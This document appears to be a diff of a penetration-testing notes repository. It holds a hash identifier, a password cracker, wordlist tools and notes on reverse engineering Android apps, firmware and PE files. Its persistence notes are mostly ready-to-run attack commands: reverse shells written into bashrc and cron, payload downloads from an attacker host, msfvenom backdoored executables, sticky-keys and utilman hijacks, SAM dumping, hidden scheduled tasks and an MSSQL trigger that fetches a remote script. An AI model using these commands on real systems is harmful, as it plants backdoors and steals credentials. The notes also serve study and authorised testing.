if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0:
|
||||
jerar.append("121020")
|
||||
|
||||
def SHA512(hash):
|
||||
hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("122020")
|
||||
def SHA512HMAC(hash):
|
||||
hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("122060")
|
||||
def Whirlpool(hash):
|
||||
hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("122040")
|
||||
def WhirlpoolHMAC(hash):
|
||||
hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("122080")
|
||||
|
||||
|
||||
print(logo)
|
||||
try:
|
||||
first = str(argv[1])
|
||||
except:
|
||||
first = None
|
||||
|
||||
while True:
|
||||
try:
|
||||
jerar=[]
|
||||
print("-"*50)
|
||||
if first:
|
||||
h = first
|
||||
else:
|
||||
h = input(" HASH: ")
|
||||
|
||||
ADLER32(h); CRC16(h); CRC16CCITT(h); CRC32(h); CRC32B(h); DESUnix(h); DomainCachedCredentials(h); FCS16(h); GHash323(h); GHash325(h); GOSTR341194(h); Haval128(h); Haval128HMAC(h); Haval160(h); Haval160HMAC(h); Haval192(h); Haval192HMAC(h); Haval224(h); Haval224HMAC(h); Haval256(h); Haval256HMAC(h); LineageIIC4(h); MD2(h); MD2HMAC(h); MD4(h); MD4HMAC(h); MD5(h); MD5APR(h); MD5HMAC(h); MD5HMACWordpress(h); MD5phpBB3(h); MD5Unix(h); MD5Wordpress(h); MD5Half(h); MD5Middle(h); MD5passsaltjoomla1(h); MD5passsaltjoomla2(h); MySQL(h); MySQL5(h); MySQL160bit(h); NTLM(h); RAdminv2x(h); RipeMD128(h); RipeMD128HMAC(h); RipeMD160(h); RipeMD160HMAC(h); RipeMD256(h); RipeMD256HMAC(h); RipeMD320(h); RipeMD320HMAC(h); SAM(h); SHA1(h); SHA1Django(h); SHA1HMAC(h); SHA1MaNGOS(h); SHA1MaNGOS2(h); SHA224(h); SHA224HMAC(h); SHA256(h); SHA256s(h); SHA256Django(h); SHA256HMAC(h); SHA256md5pass(h); SHA256sha1pass(h); SHA384(h); SHA384Django(h); SHA384HMAC(h); SHA512(h); SHA512HMAC(h); SNEFRU128(h); SNEFRU128HMAC(h); SNEFRU256(h); SNEFRU256HMAC(h); Tiger128(h); Tiger128HMAC(h); Tiger160(h); Tiger160HMAC(h); Tiger192(h); Tiger192HMAC(h); Whirlpool(h); WhirlpoolHMAC(h); XOR32(h); md5passsalt(h); md5saltmd5pass(h); md5saltpass(h); md5saltpasssalt(h); md5saltpassusername(h); md5saltmd5pass(h); md5saltmd5passsalt(h); md5saltmd5passsalt(h); md5saltmd5saltpass(h); md5saltmd5md5passsalt(h); md5username0pass(h); md5usernameLFpass(h); md5usernamemd5passsalt(h); md5md5pass(h); md5md5passsalt(h); md5md5passmd5salt(h); md5md5saltpass(h); md5md5saltmd5pass(h); md5md5usernamepasssalt(h); md5md5md5pass(h); md5md5md5md5pass(h); md5md5md5md5md5pass(h); md5sha1pass(h); md5sha1md5pass(h); md5sha1md5sha1pass(h); md5strtouppermd5pass(h); sha1passsalt(h); sha1saltpass(h); sha1saltmd5pass(h); sha1saltmd5passsalt(h); sha1saltsha1pass(h); sha1saltsha1saltsha1pass(h); sha1usernamepass(h); sha1usernamepasssalt(h); sha1md5pass(h); sha1md5passsalt(h); sha1md5sha1pass(h); sha1sha1pass(h); sha1sha1passsalt(h); sha1sha1passsubstrpass03(h); sha1sha1saltpass(h); sha1sha1sha1pass(h); sha1strtolowerusernamepass(h)
|
||||
|
||||
if len(jerar)==0:
|
||||
|
||||
print("\n Not Found.")
|
||||
elif len(jerar)>2:
|
||||
jerar.sort()
|
||||
print("\nPossible Hashs:")
|
||||
print("[+] "+str(algorithms[jerar[0]]))
|
||||
print("[+] "+str(algorithms[jerar[1]]))
|
||||
print("\nLeast Possible Hashs:")
|
||||
for a in range(int(len(jerar))-2):
|
||||
print("[+] "+str(algorithms[jerar[a+2]]))
|
||||
else:
|
||||
jerar.sort()
|
||||
print("\nPossible Hashs:")
|
||||
for a in range(len(jerar)):
|
||||
print("[+] "+str(algorithms[jerar[a]]))
|
||||
|
||||
first = None
|
||||
except KeyboardInterrupt:
|
||||
print("\n\n\tBye!")
|
||||
exit()
|
|
@ -0,0 +1,20 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
import hashlib
|
||||
import pyfiglet
|
||||
|
||||
print(pyfiglet.figlet_format("md5 cracker"))
|
||||
|
||||
wordlist_location = str(input("Wordlist file location: "))
|
||||
hash_input = str(input("Enter hash to be cracked: "))
|
||||
|
||||
with open(wordlist_location, 'rb') as _f:
|
||||
for line in _f.readlines():
|
||||
line = line.strip()
|
||||
hash_ob = hashlib.sha256(line)
|
||||
#hash_ob = hashlib.md5(line)
|
||||
hashed_pass = hash_ob.hexdigest()
|
||||
print(line)
|
||||
if hashed_pass == hash_input:
|
||||
print("Password found: " + line.decode())
|
||||
exit(0)
|
|
@ -0,0 +1,48 @@
|
|||
# Generate Wordlists
|
||||
|
||||
* [username_generator](https://github.com/therodri2/username_generator.git)
|
||||
* [CeWL](../enumeration/CeWL/README.md)
|
||||
* [Mentalist](https://github.com/sc0tfree/mentalist.git)
|
||||
* [lyricpass](https://github.com/initstring/lyricpass.git)
|
||||
* [pnwgen phonenumbers](https://github.com/toxydose/pnwgen.git)
|
||||
|
||||
|
||||
## Cupp
|
||||
|
||||
* [cupp](https://github.com/Mebus/cupp.git)
|
||||
* Interactive dialogue via `cupp.py -i`
|
||||
* Wordlistdownload via `cupp.py -l`
|
||||
* Connections to alecto DB via `-a`
|
||||
|
||||
## crunch
|
||||
|
||||
```sh
|
||||
crunch <minlen> <maxlen> <charPool> -o <output.file>
|
||||
```
|
||||
|
||||
* Option `-t` specifies variable characters
|
||||
* `@`, lower case alpha characters
|
||||
* `,`, upper case alpha characters
|
||||
* `%`, numeric characters
|
||||
* `^`, special characters including space
|
||||
```sh
|
||||
crunch 8 8 -t passw%%rd
|
||||
```
|
||||
|
||||
## ttpassgen
|
||||
* [ttpassgen](https://github.com/tp7309/TTPassGen.git)
|
||||
* Generate lists from the ground up
|
||||
* `pip install ttpassgen`
|
||||
```sh
|
||||
ttpassgen --rule '[?d]{6:6:*}' 6digitpins.txt
|
||||
```
|
||||
```sh
|
||||
ttpassgen --rule '[?l]{1:5:*}' all_letter_combinations.txt
|
||||
```
|
||||
```sh
|
||||
ttpassgen --dictlist "in.txt,in2.txt" --rule '$0[_]?$1' -s " " out.txt
|
||||
```
|
||||
|
||||
# exrex
|
||||
|
||||
* Generate all possible outcomes from regex string
|
|
@ -0,0 +1,8 @@
|
|||
# Bashrc Bogus
|
||||
|
||||
## Add Reverse Shell
|
||||
```sh
|
||||
echo 'bash -c "bash -i >& /dev/tcp/<attacker-IP>/<attacker-Port> 0>&1"' >> ~/.bashrc
|
||||
```
|
||||
|
||||
|
|
@ -0,0 +1,15 @@
|
|||
# Cronjobs
|
||||
|
||||
* `crontab -l`
|
||||
* `cat /etc/crontab`
|
||||
|
||||
## Add Cronjob
|
||||
* Add line
|
||||
```sh
|
||||
* * * * * root curl http://<attacker-IP>:8000/shell.sh | bash
|
||||
```
|
||||
* Shell content
|
||||
```sh
|
||||
bash -c "bash -i >& /dev/tcp/<attacker-IP>/<attacker-Port> 0&1"
|
||||
```
|
||||
|
|
@ -0,0 +1,6 @@
|
|||
# Meterpreter Persistence
|
||||
|
||||
## Load shell on system startup
|
||||
```sh
|
||||
run persistence -X
|
||||
```
|
|
@ -0,0 +1,323 @@
|
|||
# Persistence
|
||||
|
||||
* Gain through
|
||||
* Startup folder persistence
|
||||
* Editing registry keys
|
||||
* Scheduled tasks
|
||||
* SUID
|
||||
* BITS
|
||||
* Creating a backdoored service
|
||||
* Creat user
|
||||
* RDP
|
||||
|
||||
## Gain Persistence on Windows
|
||||
* Browser. Add to trusted sites.
|
||||
* Powershell
|
||||
```sh
|
||||
Invoke-WebRequest http://<attacker-IP>:<attackerPort>/shell.exe -OutFile .\shell2.exe
|
||||
```
|
||||
* DOSprompt
|
||||
```cmd
|
||||
certutil -urlcache -split -f http://<attacker-IP>:<attacker-Port/shell.exe
|
||||
```
|
||||
* Use `multi/handler` on attacker and `set PAYLOAD windows/meterpreter/reverse_tcp`
|
||||
### Paths to Persistence
|
||||
* Put in startup directory
|
||||
```sh
|
||||
C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
|
||||
```
|
||||
* Put the reverse_shell into `%appdata%` and add a registry key
|
||||
```sh
|
||||
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\Users\<USER>\AppData\Roaming\backdoor.exe"
|
||||
```
|
||||
### Background Intelligence Transfer Service (BITS)
|
||||
```sh
|
||||
bitsadmin /create __shell__
|
||||
bitsadmin /addfile __shell__ "http://<attacker-IP>:<attacker-Port>/shell2.exe" "C:\Users\<USER>\Documents\shell2.exe"
|
||||
```
|
||||
```sh
|
||||
bitsadmin /SetNotifyCmdLine 1 cmd.exe "/c shell2.exe /complete __shell__ | start /B C:\Users\<USER>\Documents\shell2.exe"
|
||||
bitsadmin /SetMinRetryDelay 30
|
||||
bitsadmin /resume
|
||||
```
|
||||
|
||||
## Elevate Privileges
|
||||
* Create user `net user /add <user> <pass>`
|
||||
* Add to admin group via `net localgroup administrators <user> /add`
|
||||
* Check `net localgroup Administrator`
|
||||
|
||||
### More stealthy
|
||||
|
||||
* Backup Operator group is more stealthy, no admin by r/w on files
|
||||
```sh
|
||||
net localgroup "Backup Operators" <user> /add
|
||||
net localgroup "Remote Management Users" <user> /add
|
||||
```
|
||||
* The following two groups are assigned through membership of `Backup Operators`
|
||||
* SeBackupPrivilege, read files
|
||||
* SeRestorePrivilege, write files
|
||||
|
||||
* Any local group is stripped of off its admin permissions when logging in via RDP. Therefore disable the following regkey via
|
||||
```sh
|
||||
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 1
|
||||
```
|
||||
* Afterwards, check if `Backup Operators` is enabled via `whoami /groups`
|
||||
* Backup `SAM` and `SYSTEM` via
|
||||
```sh
|
||||
reg save hklm\system system.bak
|
||||
reg save hklm\sam sam.bak
|
||||
download system.bak
|
||||
download sam.bak
|
||||
secretsdump.py -sam sam.bak -system system.bak LOCAL
|
||||
```
|
||||
* Pass-the-hash via evil-winrm
|
||||
|
||||
### secedit
|
||||
|
||||
* Get r/w on files through editing a config file
|
||||
* Export secedit and open it
|
||||
```sh
|
||||
secedit /export /cfg config.inf
|
||||
```
|
||||
* Add user to the groups
|
||||
```sh
|
||||
SeBackupPrivilege = [...],<username>
|
||||
SeRestorePrivilege = [...],<username>
|
||||
```
|
||||
* Convert the file
|
||||
```sh
|
||||
secedit /import /cfg config.inf /db config.sdb
|
||||
secedit /configure /db config.sdb /cfg config.infk
|
||||
```
|
||||
* Add the user to the RDP group via net localgroup like before or do
|
||||
```sh
|
||||
Set-PSSessionConfiguration -Name Microsoft.PowerShell -showSecurityDescriptorUI
|
||||
```
|
||||
* Add & Click user -> Full Control(All Operations)
|
||||
* Set `LocalAccountTokenFilterPolicy` to `1` like in the section before
|
||||
|
||||
### Relative ID (RID)
|
||||
|
||||
* UID like in linux
|
||||
* Administrator has `RID = 500`
|
||||
* Other interactive users `RID >= 1000`
|
||||
* Get RIDs
|
||||
```sh
|
||||
wmic useraccount get name,sid
|
||||
```
|
||||
* Assign `500` to regular user
|
||||
```sh
|
||||
PsExec64.exe -i -s regedit
|
||||
```
|
||||
* Open `HKLM\SAM\SAM\Domains\Account\Users\<0xRID>`
|
||||
* Search for RID value as hexadecimal value
|
||||
* Open the key called `F` and change effective RID at position `0x30`
|
||||
* Insert LE hex of `0d500`, which is `f401`
|
||||
|
||||
## Add to registry
|
||||
|
||||
* Execute on user logon via
|
||||
```sh
|
||||
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d "Userinit.exe, C:\yadda\shell2.exe" /f
|
||||
```
|
||||
|
||||
## Add a Service
|
||||
|
||||
### Meterpreter
|
||||
|
||||
* Inside meterpreter `load powershell` and `powershell_shell`
|
||||
```sh
|
||||
New-Service -Name "<SERVICE_NAME>" -BinaryPathName "<PATH_TO_BINARY>" -Description "<SERVICE_DESCRIPTION>" -StartupType "Boot"
|
||||
```
|
||||
|
||||
### Powershell
|
||||
|
||||
* Start a service automatically
|
||||
```sh
|
||||
sc.exe create SteamUpdater binPath= "net user Administrator Passwd123" start= auto
|
||||
sc.exe start SteamUpdater
|
||||
```
|
||||
|
||||
* Use a service PE instead
|
||||
```sh
|
||||
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT -f exe-service -o SteamUpdater.exe
|
||||
```
|
||||
|
||||
* Modify an existing service
|
||||
* Enumerate all the services
|
||||
```sh
|
||||
sc.exe query state=all
|
||||
```
|
||||
* Info about a specific service, start type should be automatic, service start name should be target user
|
||||
```sh
|
||||
sc.exe qc <ServiceName>
|
||||
```
|
||||
* Reconfigure
|
||||
```sh
|
||||
sc.exe config FoundService binPath= "C:\Windows\SteamUpdater.exe" start= auto obj= "LocalSystem"
|
||||
sc.exe start FoundService
|
||||
```
|
||||
|
||||
## Add Scheduled Task
|
||||
|
||||
```sh
|
||||
$A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C"\Users\Administrator\Documents\rshell.exe
|
||||
$B = New-ScheduledTaskTrigger -AtLogOn
|
||||
$C = New-ScheduledTaskPrincipal -UserId "NT AUTHORITY/SYSTEM" -RunLevel Highest
|
||||
$D = New-ScheduledTaskSettingsSet
|
||||
$E = New-ScheduledTask -Action $A -Trigger $B -Principal $C -Settings $D
|
||||
Register-ScheduledTask ReverseShell -InputObject $E
|
||||
```
|
||||
|
||||
* Alternatively via `schtasks`
|
||||
```sh
|
||||
schtasks /create /sc minute /mo 1 /tn SteamUpdater /tr "c:\windows\temp\nc.exe -e cmd.exe $ATTACKER_IP $ATTACKER_PORT" /ru SYSTEM
|
||||
```
|
||||
* Check task
|
||||
```sh
|
||||
schtasks /query /tn SteamUpdater
|
||||
```
|
||||
|
||||
* Deleting Security Descriptor of a task to make it invisible. Delete the following key
|
||||
```sh
|
||||
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\<taskname>\SD
|
||||
```
|
||||
|
||||
## File Backdoor
|
||||
|
||||
### Mimic PE
|
||||
```sh
|
||||
msfvenom -a x64 --platform windows -x putty.exe -k -p windows/x64/shell_reverse_tcp lhost=$ATTACKER_IP lport=$ATTACKER_PORT -b "\x00" -f exe -o puttyX.exe
|
||||
```
|
||||
|
||||
### Reference Script
|
||||
* Recycle shortcut of an app to reference a reverse shell script
|
||||
* Right click -> `Properties` -> `Target`
|
||||
* Reference the the script `certainlynobackdoor.ps1` via
|
||||
```sh
|
||||
powershell.exe -WindowStyle hidden C:\Windows\System32\certainlynobackdoor.ps1
|
||||
```
|
||||
* Content of the script `certainlynobackdoor.ps1`
|
||||
```sh
|
||||
Start-Process -NoNewWindow "c:\tools\nc.exe" "-e cmd.exe $ATTACKER_IP $ATTACKER_PORT"
|
||||
C:\Windows\System32\calc.exe
|
||||
```
|
||||
|
||||
### File Association
|
||||
|
||||
* Change associated `ProgID` of a file type inside registry `HKLM\Software\Classes\`
|
||||
* Choose a class and `<class>/shell/open/command` contains the file to be opened as the first argument `%1`
|
||||
* Chang the argument to a shell script and pass the arg through it
|
||||
```sh
|
||||
Start-Process -NoNewWindow "c:\windows\temp\nc.exe" "-e cmd.exe $ATTACKER_IP $ATTACKER_PORT"
|
||||
C:\Windows\system32\NOTEPAD.EXE $args[0]
|
||||
```
|
||||
* Change `command\default` to `powershell -windowstyle hidden C:\windows\temp\steamupdater.ps1 %1`
|
||||
|
||||
|
||||
## Persistence via Logon
|
||||
|
||||
### Startup directories
|
||||
* Users' Startup directory under
|
||||
```sh
|
||||
C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
|
||||
```
|
||||
|
||||
* Startup directory for all users, put the reverse shell here
|
||||
```sh
|
||||
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
|
||||
```
|
||||
|
||||
### Registry Keys
|
||||
|
||||
* `HKCU\Software\Microsoft\Windows\CurrentVersion\Run`
|
||||
* `HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce`
|
||||
* `HKLM\Software\Microsoft\Windows\CurrentVersion\Run`
|
||||
* `HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce`
|
||||
|
||||
* Create `Expandable String Value` under any of this keys with the value of the reverse shell path
|
||||
|
||||
|
||||
* `HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\` loads user profile after authentication is done
|
||||
* Either `shell` or `Userinit` can be appended with a comma separated command
|
||||
|
||||
### Logon Scripts
|
||||
|
||||
* `userinit.exe` checks var `UserInitMprLogonScript` which cann be used to load logon scripts
|
||||
|
||||
* Create variable `UserInitMprLogonScript` under `HKCU\Environment` which gets the reverse shell as a payload
|
||||
|
||||
|
||||
## RDP or Login Screen
|
||||
|
||||
### Sticky Keys
|
||||
* Press shift x 5 and `C:\Windows\System32\sethc.exe` will be executed
|
||||
* Take ownership of the binary via
|
||||
```sh
|
||||
takeown /f c:\Windows\System32\sethc.exe
|
||||
icacls C:\Windows\System32\sethc.exe /grant Administrator:F
|
||||
```
|
||||
* Overwrite with `cmd.exe`
|
||||
```sh
|
||||
copy c:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
|
||||
```
|
||||
|
||||
### Utilman
|
||||
|
||||
* Ease of access button is clickable at the login screen, it is executed with system privileges
|
||||
* Take ownership and overwrite with `cmd.exe`
|
||||
```sh
|
||||
takeown /f c:\Windows\System32\utilman.exe
|
||||
icacls C:\Windows\System32\utilman.exe /grant Administrator:F
|
||||
copy c:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exe
|
||||
```
|
||||
|
||||
## Web Shell
|
||||
|
||||
* Default user is `iis apppool\defaultapppool`
|
||||
* Has `SeImpersonatePrivilege`
|
||||
|
||||
* [Download Web Shell](https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmdasp.aspx)
|
||||
* Move shell to `C:\inetpub\wwwroot` on target
|
||||
* Get the shell via `http://$TARGET_IP/shell.aspx`
|
||||
|
||||
## MSSQL
|
||||
|
||||
* Triggers bind actions such as INSERTs
|
||||
|
||||
* Open Microsoft SQL Server Management Studio
|
||||
* Choose windows auth
|
||||
* `New Query`
|
||||
* Enable Advance Options via
|
||||
```sh
|
||||
sp_configure 'Show Advanced Options',1;
|
||||
RECONFIGURE;
|
||||
GO
|
||||
|
||||
sp_configure 'xp_cmdshell',1;
|
||||
RECONFIGURE;
|
||||
GO
|
||||
```
|
||||
* Grant privileges to all users
|
||||
```sh
|
||||
USE master
|
||||
GRANT IMPERSONATE ON LOGIN::sa to [Public];
|
||||
```
|
||||
|
||||
* Change to DB
|
||||
```sh
|
||||
USE <DATABASE>
|
||||
```
|
||||
|
||||
* Create trigger
|
||||
```sh
|
||||
CREATE TRIGGER [sql_backdoor]
|
||||
ON HRDB.dbo.Employees
|
||||
FOR INSERT AS
|
||||
|
||||
EXECUTE AS LOGIN = 'sa'
|
||||
EXEC master..xp_cmdshell 'Powershell -c "IEX(New-Object net.webclient).downloadstring(''http://ATTACKER_IP:8000/evilscript.ps1'')"';
|
||||
```
|
||||
|
||||
* Trigger the trigger by visiting the site which triggers the trigger through a db call
|
||||
|
|
@ -0,0 +1,3 @@
|
|||
# WMI Backdoor
|
||||
|
||||
* [BlackHat 2015, Backdoor](https://github.com/mattifestation/WMI_Backdoor.git)
|
|
@ -0,0 +1,81 @@
|
|||
# Misc
|
||||
|
||||
* `Dalvik` is the JVM of Android
|
||||
|
||||
## SMALI
|
||||
|
||||
* `SMALI` is the byte code derived from Java.
|
||||
* Types
|
||||
```
|
||||
V void
|
||||
Z boolean
|
||||
B byte
|
||||
S short
|
||||
C char
|
||||
F float
|
||||
I int
|
||||
J long
|
||||
D double
|
||||
[ array
|
||||
```
|
||||
|
||||
### Registers
|
||||
* Registers are 32 bits
|
||||
* Type long and double use two registers 32+32=64 bits
|
||||
* `.registers`, total number of regs in method
|
||||
* `.locals`, non parameter regs in method
|
||||
* Arguments of a method are put into registers from highest to lowest.
|
||||
* The object itself is a parameter to its method.
|
||||
|
||||
* Register naming schemes are
|
||||
* Normal local register are name v0, v1, v2 ...
|
||||
* Parameter register are a second naming on top, e.g.v2 and p0 or v3 and p1 are the same registers.
|
||||
|
||||
|
||||
## APK Structure
|
||||
|
||||
* `AndroidManifest.xml`, binary XML
|
||||
* `classes.dex`, app code compilation as dex
|
||||
* `resource.arsc`, precompiled resources in XML
|
||||
* `res`, resource dir
|
||||
* `assets` app assets
|
||||
* `lib`, libraries
|
||||
* `META/INF`, contains metadata file `MANIFEST.MF` and signature of the apk.
|
||||
|
||||
## Tools
|
||||
|
||||
* `jadx -d <outdir> <apk or dex>` as a decompiler
|
||||
* dex2jar to convert apk to jar
|
||||
```sh
|
||||
d2j-dex2jar.sh /path/application.apk
|
||||
```
|
||||
* Dex to smali with `d2j-dex2smali`
|
||||
* jd-gui as decompiler
|
||||
* `apktool` smali source from apk
|
||||
|
||||
* [Firebase scanner](https://github.com/shivsahni/FireBaseScanner.git)
|
||||
* [Mara reversing framework](https://github.com/xtiankisutsa/MARA_Framework.git)
|
||||
* [Mobile Security Framework](https://github.com/MobSF/Mobile-Security-Framework-MobSF.git)
|
||||
* Proguard deobfuscates code
|
||||
* [PID Cat log reader](https://github.com/JakeWharton/pidcat.git)
|
||||
* Burpsuite listener on Android emulator
|
||||
* [Drozer](https://github.com/FSecureLABS/drozer)
|
||||
```sh
|
||||
adb forward tcp:31415 tcp:31415
|
||||
drozer console connect
|
||||
run app.package.list -> see all the packages installed
|
||||
run app.package.info -a -> view package information.
|
||||
run app.package.attacksurface package_name
|
||||
run app.activity.info -f package_name
|
||||
run app.activity.start --component package name component_name
|
||||
```
|
||||
```sh
|
||||
run app.provider.info -a package_name
|
||||
run scanner.provider.finduris -a package_name
|
||||
run app.provider.query uri
|
||||
run app.provider.update uri --selection conditions selection_arg column data
|
||||
run scanner.provider.sqltables -a package_name
|
||||
run scanner.provider.injection -a package_name
|
||||
run scanner.provider.traversal -a package_name
|
||||
```
|
||||
|
|
@ -0,0 +1,97 @@
|
|||
# Deobfuscation
|
||||
|
||||
## Principles of Obfuscation
|
||||
|
||||
* Software obfuscation may be divided into a theoretical layered approach, done by [Hui Xu et. al](https://cybersecurity.springeropen.com/track/pdf/10.1186/s42400-020-00049-3.pdf)
|
||||
|
||||
* These layers and what's obfuscated are:
|
||||
* __Code Element__
|
||||
* Layout
|
||||
* Controls
|
||||
* Data
|
||||
* Classes
|
||||
* Methods
|
||||
* __Software Component__
|
||||
* __Inter Component__
|
||||
* Library calls
|
||||
* Used Resources
|
||||
* __Application__
|
||||
* DRM System
|
||||
* Neural Networks
|
||||
|
||||
## Evade Statical Rules
|
||||
|
||||
* Critical data is obfuscated by the __Code Element__ layer which contains the following methods of obfuscation
|
||||
* __Array Transformation__
|
||||
* __Data Encoding__
|
||||
* __Data Procedurization__
|
||||
* __Data Splitting & Merging__
|
||||
|
||||
### Splitting & Merging of Strings
|
||||
|
||||
* Breaking signature by modifying data distribution inside the code
|
||||
* This may be done by modifying strings and functions through following measures
|
||||
|
||||
* __Joining__
|
||||
```python
|
||||
"CAFFEE" + "BABE"
|
||||
```
|
||||
|
||||
* __Reordering__
|
||||
```python
|
||||
a = "BABE"
|
||||
b = "CAFFEE"
|
||||
f"{b}{a}"
|
||||
```
|
||||
|
||||
* __Whitespaces of functions which are not interpreted__
|
||||
```c
|
||||
int main ( void ) {
|
||||
printf ( "The answer is %d", 42 ) ;
|
||||
}
|
||||
```
|
||||
|
||||
* __Adding ticks which are not interpreted__
|
||||
|
||||
* __Change `uPpER aNd loWeRcAsE oF cHaRaCtErS iN tHe StRinG`__
|
||||
|
||||
### Adding Unnecessary Instructions
|
||||
|
||||
* Obfuscation of layout and controls inside the code
|
||||
* __Junk Stubs__
|
||||
* __Separation of Related Code__
|
||||
* __Stripping Redundant Symbols__
|
||||
* __Meaningless Identifiers__
|
||||
* __Converting Explicit to Implicit Instructions__
|
||||
* __Dispatcher Based Controls Executed During Runtime__
|
||||
* __Probabilistic Control Flows__
|
||||
* __Bogus Control Flows__
|
||||
|
||||
|
||||
### Control Flow
|
||||
|
||||
* Changing or adding to the flow of the code through change of conditions
|
||||
* Changes may be set to arbitrary code segments by __Opaque Predicates__
|
||||
* An __Opaque Predicate__ is a control path and value known by the obfuscater and hard to find out by the reverse engineer
|
||||
|
||||
### Protecting Data
|
||||
|
||||
* Stripping and protecting
|
||||
* __Code Structure__
|
||||
* __Object names__
|
||||
* __File & Compilation Properties__
|
||||
|
||||
* To strip symbols
|
||||
```sh
|
||||
strip --strip-all <binary>
|
||||
```
|
||||
|
||||
* Check via
|
||||
```sh
|
||||
nm <binary>
|
||||
```
|
||||
|
||||
## Usage
|
||||
|
||||
* Find a deobfuscator like [de4dot](https://github.com/de4dot/de4dot.git) for e.g. deobfuscating dotfuscator
|
||||
* In case of dotnet: __Do not only use ghidra for reversing, use [ILSpy](https://github.com/icsharpcode/ILSpy.git) as well__
|
|
@ -0,0 +1,9 @@
|
|||
# DLL Reversing
|
||||
|
||||
* Start DLL on its own with the help a wrapper
|
||||
```C#
|
||||
HMODULE dll = LoadLibraryA("DLL.DLL");
|
||||
typedef void(WINAPI* Add_TypeDef)(int, int); // Add(int x, int y)
|
||||
Add_TypeDef Add = (Add_TypeDef)GetProcAddress(dll, "Add_MangledName");
|
||||
Add(1, 2);
|
||||
```
|
|
@ -0,0 +1,35 @@
|
|||
# Reversing Firmware
|
||||
|
||||
## Tools
|
||||
* binwalk
|
||||
* unlzma
|
||||
* tar
|
||||
* [fat](https://github.com/attify/firmware-analysis-toolkit.git)
|
||||
* Create usable environment and start firmware inside it
|
||||
```sh
|
||||
./fat.py <firmware>
|
||||
```
|
||||
* [Jefferson](https://github.com/sviehb/jefferson) or AUR package `jefferson-git`
|
||||
|
||||
## Usage
|
||||
* Check image via `strings`
|
||||
* Check CRC via `cksum -a crc <image>`
|
||||
* Use `binwalk` to extract. There are to methods
|
||||
* `-e` extract by offset
|
||||
* `--dd=".*"` by file extension
|
||||
|
||||
### Mount JFFS2 File
|
||||
* Use kernel where `CONFIG_MTD_RAM` is set. Using Arch this is any kernel before `5.10`
|
||||
```sh
|
||||
rm -rf /dev/mtdblock0
|
||||
mknod /dev/mtdblock0 b 31 0
|
||||
mkdir /mnt/jffs2
|
||||
modprobe jffs2
|
||||
modprobe mtdram
|
||||
modprobe mtdblock
|
||||
dd if=<jffs2File> of=/dev/mtdblock0
|
||||
mount -t jffs2 /dev/mtdblock0 /mnt/jffs2/
|
||||
```
|
||||
|
||||
## Tips & Tricks
|
||||
* Watch out for `HNAP` and `JNAP` as [an attack vector](https://routersecurity.org/hnap.php)
|
|
@ -0,0 +1,4 @@
|
|||
# Function Decoration
|
||||
|
||||
* Done to imported functions in order to do interpositioning and identify the variants of the function.
|
||||
* [name mangling](https://en.wikipedia.org/wiki/Name_mangling)
|
|
@ -0,0 +1,17 @@
|
|||
# Krakatau
|
||||
|
||||
## Usage
|
||||
* Get bytecode from `jar` file
|
||||
```sh
|
||||
krakatau-disassemble -r file.jar -out dissassemble.zip
|
||||
```
|
||||
* Generate bytecode
|
||||
```sh
|
||||
krakatau-assemble -out result.jar -r dissassembled/
|
||||
```
|
||||
* Do changes to the bytecode
|
||||
* Compile jar file
|
||||
```sh
|
||||
java -cp result.jar <fileNameOfMainClass>
|
||||
```
|
||||
|
|
@ -0,0 +1,33 @@
|
|||
# Portable Executable
|
||||
|
||||
* [Windows PE doc](https://docs.microsoft.com/en-us/windows/win32/debug/pe-format)
|
||||
* An executable binary in the windows world
|
||||
The file format consists of
|
||||
* PE Header
|
||||
* Data Sections
|
||||
|
||||
## Data Section
|
||||
|
||||
The data section consists of
|
||||
* __.text__, program code
|
||||
* __.data__, initialized variables
|
||||
* __.bss__, unanitialized variables
|
||||
* __.edata__, exportable objects and related table info
|
||||
* __.idata__, imported objects and related table info
|
||||
* __.reloc__, image relocation info
|
||||
* __.rsrc__, links external resources, e.g. icons, images, manifests
|
||||
|
||||
## Starting a PE
|
||||
|
||||
If a process starts, the PE is read in the following order
|
||||
1. Header sections
|
||||
* File signatue is __MZ__, and magic number are read
|
||||
* Architecture of the platform
|
||||
